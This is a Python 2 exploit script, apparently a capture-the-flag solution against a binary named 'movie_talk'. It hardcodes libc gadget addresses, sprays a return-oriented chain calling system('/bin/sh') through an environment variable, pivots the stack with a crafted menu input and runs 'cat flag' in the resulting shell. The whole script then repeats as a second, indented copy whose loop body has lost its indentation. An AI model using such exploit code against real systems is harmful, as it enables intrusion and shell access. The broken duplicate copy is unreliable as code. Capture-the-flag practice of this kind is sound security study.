potetisensei/movie_talk.py

## movie_talk.py
#from pexpect import *
from commands import getoutput
from struct import pack, unpack
from subprocess import Popen, PIPE
from time import sleep
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK, read
from os import putenv, environ

libc_base = 0x555a2000
add_esp = libc_base + 0x10d84d
system = libc_base + 0x3e360
binsh = libc_base + 0x15d1a9
ret = libc_base + 0xe7819

print hex(ret)
print hex(system)
print hex(binsh)
nop = pack("<I", ret)
rop = pack("<I", system) + "aaaa" + pack("<I", binsh)
assert(not "\x00" in nop)
assert(not "\x00" in rop)

for i in environ:
    putenv(i, "")
putenv("ROP ", nop * 0x4000 + rop + "aa")
p = Popen(["./movie_talk"], stdin=PIPE, stdout=PIPE)

p.stdin.write("1\n")
p.stdin.write("hoge\n")
p.stdin.write("1\n")
p.stdin.write("0\n")

p.stdin.write("1\n")
p.stdin.write("fuga\n")
p.stdin.write("2\n")
p.stdin.write("0\n")

p.send_signal(3)

p.stdin.write("1\n")
payload = ""
payload += pack("<I", add_esp)
payload += pack("<I", 0xdeadbeef)
payload += pack("<I", 0xfeedface)
payload += pack("<I", 0xcafebabe)
payload += "aa"
assert(not "\n" in payload)
p.stdin.write(payload+"\n")
p.stdin.write("3\n")
p.stdin.write("0\n")

p.stdin.write("3\n")
sleep(2)
p.stdin.write("cat flag\n")
print p.stdout.read(1024)
print p.stdout.read(1024)
print p.stdout.read(1024)
print p.stdout.read(1024)
print p.stdout.read(1024)
	#from pexpect import *
	from commands import getoutput
	from struct import pack, unpack
	from subprocess import Popen, PIPE
	from time import sleep
	from fcntl import fcntl, F_GETFL, F_SETFL
	from os import O_NONBLOCK, read
	from os import putenv, environ

	libc_base = 0x555a2000
	add_esp = libc_base + 0x10d84d
	system = libc_base + 0x3e360
	binsh = libc_base + 0x15d1a9
	ret = libc_base + 0xe7819

	print hex(ret)
	print hex(system)
	print hex(binsh)
	nop = pack("<I", ret)
	rop = pack("<I", system) + "aaaa" + pack("<I", binsh)
	assert(not "\x00" in nop)
	assert(not "\x00" in rop)

	for i in environ:
	putenv(i, "")
	putenv("ROP ", nop * 0x4000 + rop + "aa")
	p = Popen(["./movie_talk"], stdin=PIPE, stdout=PIPE)

	p.stdin.write("1\n")
	p.stdin.write("hoge\n")
	p.stdin.write("1\n")
	p.stdin.write("0\n")

	p.stdin.write("1\n")
	p.stdin.write("fuga\n")
	p.stdin.write("2\n")
	p.stdin.write("0\n")

	p.send_signal(3)

	p.stdin.write("1\n")
	payload = ""
	payload += pack("<I", add_esp)
	payload += pack("<I", 0xdeadbeef)
	payload += pack("<I", 0xfeedface)
	payload += pack("<I", 0xcafebabe)
	payload += "aa"
	assert(not "\n" in payload)
	p.stdin.write(payload+"\n")
	p.stdin.write("3\n")
	p.stdin.write("0\n")

	p.stdin.write("3\n")
	sleep(2)
	p.stdin.write("cat flag\n")
	print p.stdout.read(1024)
	print p.stdout.read(1024)
	print p.stdout.read(1024)
	print p.stdout.read(1024)
	print p.stdout.read(1024)